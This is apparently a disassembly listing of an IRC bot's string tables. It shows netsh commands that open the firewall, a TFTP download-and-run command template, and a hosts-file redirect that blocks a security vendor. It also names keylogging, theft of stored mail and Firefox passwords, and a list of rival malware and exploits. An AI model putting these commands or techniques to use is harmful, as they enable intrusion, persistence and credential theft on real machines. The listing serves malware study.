dd offset aMozilla4_0Co_7 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla4_0Co_8 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla4_0Co_9 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla4_0C_15 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla4_0C_16 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla4_0C_17 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla4_0C_18 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla4_0C_19 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla4_0C_20 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla4_0C_21 ; "Mozilla/4.0 compatible ZyBorg/1.0 (wn.z"...
dd offset aMozilla4_75En ; "Mozilla/4.75 [en]"
dd offset aMozilla5_0Wi_7 ; "Mozilla/5.0 (Windows; U; Windows NT 5.2"...
dd offset aMozilla5_0X11U ; "Mozilla/5.0 (X11; U; FreeBSD i386; en-U"...
align 10h
aMozilla5_0Wi_7 db 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.5a) Gecko/20'
; DATA XREF: .text:0043D994�o
db '030728 Mozilla Firebird/0.6.1',0
align 10h
aMozilla4_0C_21 db 'Mozilla/4.0 compatible ZyBorg/1.0 (wn.zyborg@looksmart.net; http:'
; DATA XREF: .text:0043D98C�o
db '//www.WISEnutbot.com)',0
align 4
aMozilla4_0C_20 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)',0
; DATA XREF: .text:0043D988�o
align 8
aMozilla4_0C_19 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ODI3 Navigator'
; DATA XREF: .text:0043D984�o
db ')',0
align 10h
aMozilla4_0C_18 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.3.1.0'
; DATA XREF: .text:0043D980�o
db ')',0
align 8
aMozilla4_0C_17 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts'
; DATA XREF: .text:0043D97C�o
db '-MyWay; (R1 1.3); .NET CLR 1.1.4322)',0
align 10h
aMozilla4_0C_16 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; DigExt)',0
; DATA XREF: .text:0043D978�o
align 10h
aMozilla4_0C_15 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser '
; DATA XREF: .text:0043D974�o
db '[avantbrowser.com]; .NET CLR 1.1.4322)',0
aMozilla4_0C_14 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H0108'
; DATA XREF: .text:0043D95C�o
db '18; AT&T CSM6.0)',0
align 4
aMozilla4_0C_13 db 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',0
; DATA XREF: .text:0043D954�o
align 4
aMediapartnersG db 'Mediapartners-Google/2.1',0 ; DATA XREF: .text:0043D938�o
align 4
aMozilla5_0Co_7 db 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bo'
; DATA XREF: .text:0043D934�o
db 't.html)',0
align 8
aMozilla5_0Wi_6 db 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko'
; DATA XREF: .text:0043D930�o
db '/20070725 Firefox/2.0.0.6',0
align 4
aGooglebot2_1_1 db 'Googlebot/2.1 (http://www.googlebot.com/bot.html)',0
; DATA XREF: .text:0043D92C�o
align 4
aMozilla5_0X1_5 db 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/2006120'
; DATA XREF: .text:0043D928�o
db '1 Firefox/2.0.0.6 (Ubuntu-feisty)',0
align 10h
aMozilla5_0X1_4 db 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 '
; DATA XREF: .text:0043D924�o
db 'Minefield/3.0a1',0
align 4
aMozilla4_0C_12 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',0
; DATA XREF: .text:0043D920�o
align 10h
aMozilla5_0Wi_5 db 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko'
; DATA XREF: .text:0043D91C�o
db '/20070515 Firefox/2.0.0.4',0
align 10h
aMozilla5_0Maci db 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419.3 (K'
; DATA XREF: .text:0043D918�o
db 'HTML, like Gecko) Safari/419.3',0
aMozilla5_0Wi_4 db 'Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.7) Gecko/2'
; DATA XREF: .text:0043D914�o
db '0050414 Firefox/2.0.5',0
align 4
aMozilla4_0C_11 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR '
; DATA XREF: .text:0043D910�o
db '1.1.4322)',0
align 8
aMozilla5_0Co_6 db 'Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020527)'
; DATA XREF: .text:0043D90C�o
db 0
align 10h
aMozilla5_0X1_3 db 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8a5) Gecko/20041122',0
; DATA XREF: .text:0043D904�o
align 8
aMozilla5_0Wi_3 db 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko'
; DATA XREF: .text:0043D900�o
db '/20071008 Firefox/2.0.0.8',0
align 4
aGooglebot2_0_1 db 'Googlebot/2.0 (http://www.googlebot.com/bot.html)',0
; DATA XREF: .text:0043D8FC�o
align 4
aMozilla5_0Wi_2 db 'Mozilla/5.0 (Windows; U; Windows NT 5.2; pt-BR; rv:1.7.7) Gecko/2'
; DATA XREF: .text:0043D8F8�o
db '0050414 Firefox/2.0.5',0
align 10h
aCouldnTResolve db 'Couldn',27h,'t resolve',0 ; DATA XREF: sub_4140F8:loc_41415D�o
align 4
a90 db '90',0 ; DATA XREF: sub_414173:loc_414242�o
align 4
a168 db '168',0 ; DATA XREF: sub_414173+BC�o
a192 db '192',0 ; DATA XREF: sub_414173:loc_41421E�o
a16 db '16',0 ; DATA XREF: sub_414173+98�o
align 4
a172 db '172',0 ; DATA XREF: sub_414173+87�o
a10 db '10',0 ; DATA XREF: sub_414173+76�o
align 4
aProccessTermin db 'Proccess terminated.',0Dh,0Ah,0 ; DATA XREF: sub_4143AB+117�o
align 4
aCouldNotReadDa db 'Could not read data from proccess.',0Dh,0Ah,0
; DATA XREF: sub_4143AB:loc_414499�o
; sub_4143AB:loc_4144E5�o
align 4
aSFailedToSta_5 db '%s Failed to start IO thread, error: <%d>.',0
; DATA XREF: sub_414508+19C�o
align 4
aSCmdPrompt db '%s CMD Prompt',0 ; DATA XREF: sub_414508+151�o
align 4
aCmd_exe db 'cmd.exe',0 ; DATA XREF: sub_414508+2C�o
; sub_423517+86�o ...
aSystemCurren_4 db 'SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\Firewal'
; DATA XREF: sub_4146B9+91�o
db 'lPolicy\DomainProfile\AuthorizedApplications\List',0
align 8
aSystemCurren_3 db 'SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\Firewal'
; DATA XREF: sub_4146B9+55�o
db 'lPolicy\StandardProfile\AuthorizedApplications\List',0
align 10h
aEnabled db ':*:Enabled:',0 ; DATA XREF: sub_4146B9+25�o
aBitdefenderFir db 'BitDefender Firewall Alert',0 ; DATA XREF: sub_41477A+1D�o
align 4
aWindowsSecurit db 'Windows Security Alert',0 ; DATA XREF: sub_41477A:loc_414785�o
align 10h
aFirewallSetAll db 'firewall set allowedprogram "%s" workstation ENABLE ALL',0
; DATA XREF: sub_414810+E2�o
aFirewallAddAll db 'firewall add allowedprogram "%s" workstation ENABLE ALL',0
; DATA XREF: sub_414810+B4�o
aFirewallSetP_2 db 'firewall set portopening TCP 8081 PORT2',0 ; DATA XREF: sub_414810+6E�o
aFirewallSetP_1 db 'firewall set portopening TCP 8080 PORT1',0 ; DATA XREF: sub_414810+45�o
aNetsh db 'netsh',0 ; DATA XREF: sub_414810+35�o
; sub_414926+43�o
align 4
aFirewallSetP_0 db 'firewall set portopening TCP 1013 BS',0 ; DATA XREF: sub_414810+11�o
align 10h
aFirewallSetPor db 'firewall set portopening TCP %d FD',0 ; DATA XREF: sub_414926+25�o
align 4
aDebugOpenedNet db '(Debug): opened netsh firewall for FTPD Port %d',0Ah,0
; DATA XREF: sub_414926+F�o
align 4
aBoot db 'boot',0 ; DATA XREF: sub_414983+75�o
; sub_41F455+8F�o
align 10h
aShell db 'shell',0 ; DATA XREF: sub_414983+70�o
; sub_41F455+8A�o
align 4
aSystem_ini db '\system.ini',0 ; DATA XREF: sub_414983+55�o
; sub_41F455+72�o
aExplorer_exeS db 'explorer.exe "%s"',0 ; DATA XREF: sub_414983+33�o
align 4
aSSystem db '%s\System',0 ; DATA XREF: sub_414983+27D�o
; sub_414CF1+16B�o
align 4
aSSpoolDriversS db '%s\spool\drivers\%s',0 ; DATA XREF: sub_414983+216�o
; sub_414CF1+124�o
aSWinsS db '%s\wins\%s',0 ; DATA XREF: sub_414983+1A2�o
; sub_414CF1+D0�o
align 4
aStubpath db 'StubPath',0 ; DATA XREF: sub_414F35+25�o
; sub_414F91+23�o
align 10h
aSoftwareMicr_1 db 'Software\Microsoft\Active Setup\Installed Components\%s',0
; DATA XREF: sub_414F35+13�o
; sub_414F91+13�o
dword_43E558 dd 6E6B6E55h ; sub_418436+35�r ...
dword_43E55C dd 6E776Fh ; sub_418930+3E�r
aInvalid db 'Invalid',0 ; DATA XREF: sub_41508A:loc_4150C7�o
aDisk db 'Disk',0 ; DATA XREF: sub_41508A:loc_4150C1�o
align 10h
aNetwork db 'Network',0 ; DATA XREF: sub_41508A:loc_4150BB�o
aCdrom db 'Cdrom',0 ; DATA XREF: sub_41508A:loc_4150B5�o
align 10h
aRamdisk db 'RAMDISK',0 ; DATA XREF: sub_41508A:loc_4150AF�o
a?: ; DATA XREF: sub_41508A+1F�o
unicode 0, <?>,0
aFailed db 'Failed',0 ; DATA XREF: sub_415126:loc_415212�o
; sub_4152FB+41�o
align 4
aSS_2 db '%s%s',0 ; DATA XREF: sub_415126+72�o
align 4
aSDriveSTotalSF db '%s Drive (%s), Total: %s, Free: %s, Available: %s',0
; DATA XREF: sub_4152FB+9F�o
align 10h
aSDriveSFailedT db '%s Drive (%s): Failed to start, device not ready',0
; DATA XREF: sub_4152FB+62�o
align 4
aDriveTotalsNAT db 'Drive Totals (N/A), Total: %s%s,Free: %s%s,Available: %s%s',0
; DATA XREF: sub_4153BB+101�o
align 10h
off_43E640 dd offset byte_5C3A41 ; DATA XREF: sub_4153BB:loc_4153FD�o
; sub_4154DA:loc_4155A0�o ...
aSEndOfList_ db '%s End of list.',0 ; DATA XREF: sub_4154DA+162�o
; sub_41C143+C4�o
aSListingDrives db '%s Listing drives:',0 ; DATA XREF: sub_4154DA+79�o
align 4
aVnc db '[VNC]:',0 ; DATA XREF: sub_415702+F7�o
align 10h
aKeylogger db '[KEYLOGGER]:',0 ; DATA XREF: sub_415702+E2�o
align 10h
aTftp db '[TFTP]:',0 ; DATA XREF: sub_415702+CD�o
aFtp_1 db '[FTP]:',0 ; DATA XREF: sub_415702+B8�o
align 10h
aScan db '[SCAN]:',0 ; DATA XREF: sub_415702+A7�o
aMain db '[MAIN]:',0 ; DATA XREF: sub_415702+96�o
aPhpshell db 'phpshell',0 ; DATA XREF: sub_415702+85�o
align 4
aWget db 'wget',0 ; DATA XREF: sub_415702+74�o
align 4
aPush db '!* PUSH',0 ; DATA XREF: sub_415702+63�o
aPan db '!* PAN',0 ; DATA XREF: sub_415702+52�o
align 4
aUdp db '!* UDP',0 ; DATA XREF: sub_415702:loc_415743�o
align 4
aSh db '!* SH',0 ; DATA XREF: sub_415702+2B�o
align 4
aPass_1 db 'PASS ',0 ; DATA XREF: sub_41580E+F7�o
; sub_41591A:loc_41595B�o
align 4
aTopic db 'TOPIC',0 ; DATA XREF: sub_41580E+E2�o
align 4
aNotice db 'NOTICE',0 ; DATA XREF: sub_41580E+CD�o
align 4
aUserhost db 'USERHOST',0 ; DATA XREF: sub_41580E+B8�o
align 4
aPing db 'PING',0 ; DATA XREF: sub_41580E+A7�o
align 10h
aPong db 'PONG',0 ; DATA XREF: sub_41580E+96�o
align 4
aOper db 'OPER',0 ; DATA XREF: sub_41580E+85�o
align 10h
aJoin db 'JOIN',0 ; DATA XREF: sub_41580E+74�o
align 4
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_41580E+63�o
aNowANetworkAdm db 'now a network administrator',0 ; DATA XREF: sub_41580E+52�o
aIrcOperator db 'IRC Operator',0 ; DATA XREF: sub_41580E:loc_41584F�o
align 4
aUser_0 db 'USER ',0 ; DATA XREF: sub_41591A+2B�o
align 4
a_bot_login db '_BOT_LOGIN',0 ; DATA XREF: sub_415970:loc_4159B1�o
align 10h
a_bot db '_BOT',0 ; DATA XREF: sub_415970+2B�o
align 4
aOpenssh_2 db 'OpenSSH_2',0 ; DATA XREF: sub_4159ED+63�o
align 4
aServUFtpServer db 'Serv-U FTP Server',0 ; DATA XREF: sub_4159ED+52�o
align 4
aApache1_3 db 'Apache/1.3',0 ; DATA XREF: sub_4159ED:loc_415A2E�o
align 4
aOpenssl0_9_6 db 'OpenSSL/0.9.6',0 ; DATA XREF: sub_4159ED+2B�o
align 4
dword_43E7A4 dd 6C755602h, 22F2F6EhaSDSDS db ' (%s:%d) -> (%s:%d) - "%s"',0
align 4
dword_43E7C8 dd 54544802h, 22F2F50haSDSDS_0 db ' (%s:%d) -> (%s:%d) - "%s"',0
align 4
unk_43E7EC db 2 ; DATA XREF: sub_415A65+2C5�o
db 50h, 48h, 50h
db 2Fh ; /
db 2Fh, 2, 20h
aSDSDS_1 db '(%s:%d) -> (%s:%d) - "%s"',0
align 10h
unk_43E810 db 2 ; DATA XREF: sub_415A65+29D�o
db 46h, 54h, 50h
db 2Fh ; /
db 2Fh, 2, 20h
aSDSDS_2 db '(%s:%d) -> (%s:%d) - "%s"',0
align 4
unk_43E834 db 2 ; DATA XREF: sub_415A65+272�o
db 49h, 52h, 43h
db 2Fh ; /
db 2Fh, 2, 20h
aSDSDS_3 db '(%s:%d) -> (%s:%d) - "%s"',0
align 4
unk_43E858 db 2 ; DATA XREF: sub_415A65+247�o
db 42h, 6Fh, 74h
db 2Fh ; /
db 2Fh, 2, 20h
aSDSDS_4 db '(%s:%d) -> (%s:%d) - "%s"',0
align 4
aSPstore_dllNot db '%s PStore.dll not loaded',0 ; DATA XREF: sub_415DBD+C5�o
align 4
aPop3Pass2 db 'POP3 Pass2',0 ; DATA XREF: sub_415EA7+29C�o
align 4
aPop3Server db 'POP3 Server',0 ; DATA XREF: sub_415EA7+250�o
aPop3UserName db 'POP3 User Name',0 ; DATA XREF: sub_415EA7+1FC�o
align 10h
aHttpmailPass2 db 'HTTPMail Pass2',0 ; DATA XREF: sub_415EA7+15F�o
align 10h
aHotmail db 'Hotmail',0 ; DATA XREF: sub_415EA7+144�o
aHttpmailUserna db 'HTTPMail UserName',0 ; DATA XREF: sub_415EA7+F3�o
align 4
asc_43E8EC: ; DATA XREF: sub_415EA7+A4�o
; sub_416C0B+83�o ...
unicode 0, <\>,0
aSoftwareMicr_2 db 'Software\Microsoft\Internet Account Manager\Accounts',0
; DATA XREF: sub_415EA7+2C�o
; sub_415EA7+96�o
align 4
aSNoPstoreEntri db '%s No PStore entries found.',0 ; DATA XREF: sub_416208+8DA�o
dword_43E944 dd 2207325h, 61724528h, 20646573h, 6C74754Fh, 206B6F6Fh
; DATA XREF: sub_416208+84E�o
dd 72707845h, 29737365h, 220023Ah, 702F6C28h, 20023A29h
dd 3A73255Bh, 5D7325h
dword_43E974 dd 2207325h, 74754F28h, 6B6F6F6Ch, 70784520h, 73736572h
; DATA XREF: sub_416208+80A�o
dd 20023A29h, 2207325h, 702F6C28h, 20023A29h, 3A73255Bh
dd 5D7325h
a220d5cc1 db '220d5cc1',0 ; DATA XREF: sub_416208+755�o
align 4
dword_43E9AC dd 2207325h, 4E534D28h, 2F444920h, 73736150h, 20023A29h
; DATA XREF: sub_416208+71D�o
dd 2F6C2802h, 23A2970h, 73255B20h, 5D73253Ah, 0
aB9819c52 db 'b9819c52',0 ; DATA XREF: sub_416208+5B4�o
align 10h
dword_43E9E0 dd 2207325h, 20454928h, 296C5255h, 2520023Ah, 28022073h
; DATA XREF: sub_416208+58F�o
dd 29702F6Ch, 5B20023Ah, 253A7325h, 5D73h
dword_43EA04 dd 2Ch ; sub_416208+518�o ...
dword_43EA08 dd 70747468h, 2F3A73hdword_43EA10 dd 70747468h, 2F3Ahdword_43EA18 dd 7274533Ah, 676E69h ; sub_416208+499�o
aStringindex db 'StringIndex',0 ; DATA XREF: sub_416208+467�o
aE161255a db 'e161255a',0 ; DATA XREF: sub_416208+44D�o
align 4
dword_43EA38 dd 2207325h, 20454928h, 206C5255h, 63617448h, 73736563h
; DATA XREF: sub_416208+428�o
dd 20023A29h, 2207325h, 702F6C28h, 20023A29h, 3A73255Bh
dd 5D7325h
a5e7e8100 db '5e7e8100',0 ; DATA XREF: sub_416208+376�o
align 10h
aWs db '%ws',0 ; DATA XREF: sub_416208+2A3�o
asc_43EA74 db '%x',0 ; DATA XREF: sub_416208+1B6�o
align 4
aSFailedToQue_1 db '%s Failed to query PStore.',0 ; DATA XREF: sub_416208+118�o
align 4
dword_43EA94 dd 5A6F1EC0h, 11D02DB1h, 0C000398Ch, 6B12D94Fh ; sub_416208+1F7�o ...
aSPstorecreatei db '%s PStoreCreateInstance() error.',0 ; DATA XREF: sub_416208+98�o
align 4
aSPstoreNotRunn db '%s PStore not running.',0 ; DATA XREF: sub_416208+2C�o
align 10h
aProtectedstora db 'ProtectedStorage',0 ; DATA XREF: sub_416208+13�o
align 4
aPath db 'path=',0 ; DATA XREF: sub_416C0B:loc_416D1F�o
align 4
aNameDefault db 'name=default',0 ; DATA XREF: sub_416C0B+FA�o
align 4
aProfiles_ini db '\profiles.ini',0 ; DATA XREF: sub_416C0B+AB�o
align 4
aApplicationDat db 'Application Data\Mozilla\Firefox',0 ; DATA XREF: sub_416C0B+28�o
align 10h
aSoftwareClient db 'SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command'
; DATA XREF: sub_416E02+F�o
db 0
align 4
aPl_base64decod db 'PL_Base64Decode',0 ; DATA XREF: sub_416F48+166�o
aPk11_checkuser db 'PK11_CheckUserPassword',0 ; DATA XREF: sub_416F48+11B�o
align 4
aPk11sdr_decryp db 'PK11SDR_Decrypt',0 ; DATA XREF: sub_416F48+109�o
aPk11_authentic db 'PK11_Authenticate',0 ; DATA XREF: sub_416F48+F7�o
align 10h
aPk11_freeslot db 'PK11_FreeSlot',0 ; DATA XREF: sub_416F48+E5�o
align 10h
aPk11_getintern db 'PK11_GetInternalKeySlot',0 ; DATA XREF: sub_416F48+D3�o
aNss_shutdown db 'NSS_Shutdown',0 ; DATA XREF: sub_416F48+C1�o
align 4
aNss_init db 'NSS_Init',0 ; DATA XREF: sub_416F48+B4�o
align 4
aSoftokn3_dll db 'softokn3.dll',0 ; DATA XREF: sub_416F48+58�o
align 4
aPlds4_dll db 'plds4.dll',0 ; DATA XREF: sub_416F48+47�o
align 10h
aNspr4_dll db 'nspr4.dll',0 ; DATA XREF: sub_416F48+24�o
align 4
aNss3_dll db 'nss3.dll',0 ; DATA XREF: sub_416F48+1D�o
align 4
aPlc4_dll db 'plc4.dll',0 ; DATA XREF: sub_416F48+18�o
align 4
asc_43EC54 db ': ',0 ; DATA XREF: sub_417149+233�o
align 4
dword_43EC58 dd 46462802h, 73615020h, 23A2973h, 20hdword_43EC68 dd 46462802h, 6C525520h, 20023A29h, 2207325h, 20464628h
; DATA XREF: sub_417149+155�o
dd 69676F4Ch, 23A296Eh, 20h
dword_43EC88 dd 643223h off_43EC8C dd offset byte_633223 ; DATA XREF: sub_417149+C2�o
dword_43EC90 dd 6769732Fh, 736E6F6Eh, 78742E32h, 74hdword_43ECA0 dd 6769732Fh, 736E6F6Eh, 7478742Eh, 0byte_43ECB0 db 7Eh ; DATA XREF: sub_4175CF:loc_417606�r
; sub_4175CF:loc_417678�o
align 8
dd offset aRxIrc ; "Rx IRC"
off_43ECBC dd offset aIrc_0 ; DATA XREF: sub_417823+95�r
; sub_417823+A3�o
; "[IRC]: "
dd offset aRxIrc_c ; "Rx IRC.c"
dd offset aIrc ; "IRC//"
dd offset aPiabot ; "PiABot"
dd offset dword_441E10
dd offset dword_441E04
dd offset dword_441DF8
dd offset dword_441DF0
dd offset dword_441DE4
dd offset dword_441DD8
dd offset dword_441DC8
dd offset dword_441DBC
dd offset dword_441DB4
dd offset dword_441DA4
dd offset dword_441D9C
dd offset dword_441D8C
dd offset dword_441D84
dd offset dword_441D78
dd offset dword_441D6C
dd offset dword_441D60
dd offset dword_441D54
dd offset dword_441D48
dd offset dword_441D38
dd offset dword_441D28
dd offset dword_441D18
dd offset aRxnzm ; "RxNZM"
dd offset dword_441CF4
dd offset aRxnzm_b ; "RxNZM.b"
dd offset a_n_z_m_Irc_p_l ; ".n.z.m. (irc.p.l.g) .. "
dd offset dword_441CC8
dd offset dword_441CA8
dd offset dword_441C9C
dd offset dword_441C90
dd offset dword_441C80
dd offset dword_441C74
dd offset dword_441C68
dd offset dword_441C5C
dd offset dword_441C4C
dd offset dword_441C40
dd offset dword_441C38
dd offset dword_441C2C
dd offset dword_441C24
dd offset loc_441C18
dd offset dword_441C10
dd offset loc_441C04
dd offset dword_441BFC
dd offset dword_441BF4
dd offset dword_441BEC
dd offset loc_441BE0
dd offset aRepFtpd ; "Rep FTPd"
dd offset aReptileWelcome ; "Reptile welcomes you..."
dd offset aStnyftpd ; "StnyFtpd"
dd offset aStnyftpd0wnsJ0 ; "StnyFtpd 0wns j00"
dd offset aAgobot ; "AgoBot"
dd offset a220WelcomeToBo ; "220 \"Welcome to Bot FTP service.\"\r\n"
dd offset aPhatbot ; "PhatBot"
dd offset a220BotServerWi ; "220 Bot Server (Win32)\r\n"
dd offset aTftpget_a ; "TFTPGet.a"
dd offset aTftpISGetSS ; "tftp -i %s get %s &%s\n"
dd offset aRxTftp ; "Rx TFTP"
dd offset aTftp_0 ; "[TFTP]"
dd offset aTftpget_b ; "TFTPGet.b"
dd offset aCmdCTftpISGetS ; "cmd /c tftp -i %s GET %s &start %s &exi"...
dd offset dword_441AD4
dd offset loc_441AC8
dd offset dword_441AC0
dd offset dword_441AB4
dd offset dword_441AA4
dd offset dword_441A98
dd offset dword_441A90
dd offset dword_441A84
dd offset dword_441A7C
dd offset loc_441A70
dd offset aC101 ; "C101"
dd offset dword_441A5C
dd offset off_441A58
dd offset a3GsUT ; "3Ƀt"
dd offset aNetapi4444bind ; "Netapi4444Bind"
dd offset dword_441A30
dd offset off_441A2C
dd offset dword_441A20
dd offset aQ8 ; "Q8"
dd offset aWeBackLooooooo ; "We BaCk LoooooooooooOOOOOOOOOOOOOooo"
dd offset aRmact ; "RMACT"
dd offset dword_4419E0
dd offset dword_4419D0
dd offset dword_4419C0
dd offset dword_4419B0
dd offset dword_4419A0
dd offset aLinkbot_dcom_b ; "Linkbot.dcom.b"
dd offset aDcom2_c ; "dcom2.c:"
dd offset aLinkbot_dcom_c ; "Linkbot.dcom.c"
dd offset aDcom2 ; "dcom2:"
dd offset aLinkbot_rpc ; "Linkbot.RPC"
dd offset aRpc_c ; "RPC.c:"
dd offset aOtherbot_a ; "Otherbot.a"
dd offset aScan_start ; "scan.start"
dd offset aOtherbot_b ; "Otherbot.b"
dd offset aRoot_start ; "root.start"
dd offset aIroffer_a ; "Iroffer.a"
dd offset aHttpIroffer_or ; "http://iroffer.org/"
dd offset aIroffer_b ; "Iroffer.b"
dd offset aTotalOffered1_ ; "Total Offered: %1.1f MB Total Transfer"...
dd offset aIrofferAll ; "Iroffer-All"
dd offset aSendingYouPack ; "** Sending you pack #%i (\"%s\"), which i"...
dd offset dword_441868
dd offset dword_441860
dd offset aMydoom_b ; "MyDoom.B"
dd offset aFbsgjnerZvpebf ; "Fbsgjner\\Zvpebfbsg\\JNO\\JNO4\\Jno Svyr An"...
dd offset aMydoom_c ; "MyDoom.C"
dd offset aFbsgjnerZvpe_0 ; "Fbsgjner\\Zvpebfbsg\\Jvaqbjf\\PheeragIrefv"...
dd offset aBlaster ; "Blaster"
dd offset dword_4417C0
dd offset aZotobForbotMod ; "Zotob/ForBot Mods"
dd offset aAddexExinfo ; "AddEx(exinfo)"
dd offset aWelchia_a ; "Welchia.a"
dd offset aRpcpatch_mutex ; "RpcPatch_Mutex"
dd offset dword_441774
dd offset dword_4417C0
dd offset dword_441768
dd offset dword_441754
dd offset aChangehosts ; "ChangeHosts"
dd offset a127_0_0_1Www_s ; "\n127.0.0.1\twww.symantec.com\n"
dd offset dword_441718
dd offset dword_44170C
dd offset dword_441704
dd offset dword_4416F0
dd offset aPnp_b ; "PNP.b"
dd offset a8d9f4e40A03d11 ; "8d9f4e40-a03d-11ce-8f69-08003e30051b"
dd offset aMssql_a ; "MSSQL.A"
dd offset aThcthcthcthcth ; "THCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHC"...
dd offset aMssql_b ; "MSSQL.B"
dd offset aExecMaster__xp ; "EXEC master..xp_cmdshell"
dd offset aWebdav ; "WebDav"
dd offset loc_44164C
dd offset aRxMain ; "Rx Main"
dd offset aMain_0 ; "[MAIN]: "
dd offset aIis5ssl ; "IIS5SSL"
dd offset byte_441620
dd offset aVncscan ; "VNCScan"
dd offset aSystemrootSyst ; "%systemroot%\\system32\\cmd.exe"
dd offset aNetdevil ; "NetDevil"
dd offset aPleaz_runS ; "pleaz_run%s"
dd offset aOptix ; "Optix"
dd offset a022moptestmv1_ ; "022OPtestv1.1\r\n"
dd offset loc_4415B7+5
dd offset loc_4415B3+1
dd offset aOld4444shell ; "Old4444Shell"
dd offset loc_441598
dd offset dword_44158C
dd offset dword_441578
dd offset dword_441568
dd offset loc_441554
dd offset dword_441544
dd offset loc_441530
dd offset dword_441520
dd offset dword_44150C
dd offset dword_441500
dd offset loc_4414E8
dd offset aTaskhider ; "TaskHider"
dd offset unk_4414C4
dd offset aBobic_a ; "Bobic.A"
dd offset aOsamaBinLadenC ; "Osama Bin Laden Captured."
dd offset aBobic_b ; "Bobic.B"
dd offset aDonateToTheHur ; "Donate to the Hurricane Katrina relief "...
dd offset aBeagle ; "Beagle"
dd offset dword_44144C
dd offset aMsblast ; "MsBlast"
dd offset aWindowsupdate_ ; "windowsupdate.com"
dd offset aLowerzones ; "LowerZones"
dd offset aSoftwareMicr_4 ; "Software\\Microsoft\\Windows\\CurrentVersi"...
dd offset aHiderGui ; "Hider-Gui"
dd offset aSoftwareAdrian ; "Software\\Adrian Lopez\\HideWindow\\Prefer"...
dd offset aHiderun ; "HideRun"
dd offset aHiderunHiddenA ; "HideRun -- hidden application launcher."...
dd offset aR57 ; "r57"
dd offset aI2luy2x1zgugph ; "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA"...
dd offset aC99 ; "c99"
dd offset aR0lgodlhfaauak ; "R0lGODlhFAAUAKIAAAAAAP//////93d3cDAwIaG"...
dd offset aDcomOldScan ; "Dcom-Old-Scan"
dd offset aPipeEpmapper ; "pipe\\epmapper\\"
dd offset aNircomline ; "NirComLine"
dd offset aNircomline ; "NirComLine"
dd offset aMsnbot_a ; "MSNBot.a"
dd offset aStaticConstCha ; "static const char *msg_english[] = {"
dd offset aMsnbot_b ; "MSNBot.b"
dd offset aImportMsnMsnme ; "#import \"MSN/MSNMessengerAPI.tlb\" named"...
dd offset aFu_rootkit_a ; "FU.Rootkit.a"
dd offset aDefineFile_dev ; "#define FILE_DEVICE_ROOTKIT 0x0000"...
dd offset aFu_rootkit_b ; "FU.Rootkit.b"
dd offset aConstWcharDevi ; "const WCHAR deviceNameBuffer[] = L\"\\De"...
dd offset aFu_rootkit_c ; "FU.Rootkit.c"
dd offset aStaticCharAc_d ; "static CHAR ac_driverName[] = \"msdirect"...
dd offset aFu_rootkit_dri ; "FU.Rootkit.Driver"
dd offset dword_441020
dd offset aFu_driver_a ; "FU.Driver.a"
dd offset aRdriv_sys ; "rdriv.sys"
dd offset aFu_driver_b ; "FU.Driver.b"
dd offset aMsdirectx_sys ; "msdirectx.sys"
dd offset aHe4hookrootkit ; "He4HookRootkit-v2.15b"
dd offset aDefineHe4_hook ; "#define HE4_HOOK_INV_VERSION 0x20001"...
dd offset aWolf_kit ; "Wolf.Kit"
dd offset aStrncpyWolffdi ; "strncpy(wolffdir, xdccdir, MAX_PATH); s"...
dd offset aFiredaemon_a ; "FireDaemon.a"
dd offset aCopyrightC2007 ; "Copyright (c) 2007 FireDaemon Technolog"...
dd offset aFiredaemon_b ; "FireDaemon.b"
dd offset aHttpWww_fireda ; "http://www.firedaemon.com"
align 10h
off_43F000 dd offset loc_439030 ; DATA XREF: sub_417A90:loc_417B46�r
dd offset aWmsoft_exe ; "wmsoft*.exe"
dd offset aNview_exe ; "nview.exe"
dd offset aSview_exe ; "sview.exe"
dd offset aNvuninst_exe ; "NVUNINST.EXE"
dd offset aNvsvc32_exe ; "nvsvc32.exe"
dd offset aNvudisp_exe ; "nvudisp.exe"
dd offset aNvappbar_exe ; "nvappbar.exe"
dd offset aNvcolor_exe ; "nvcolor.exe"
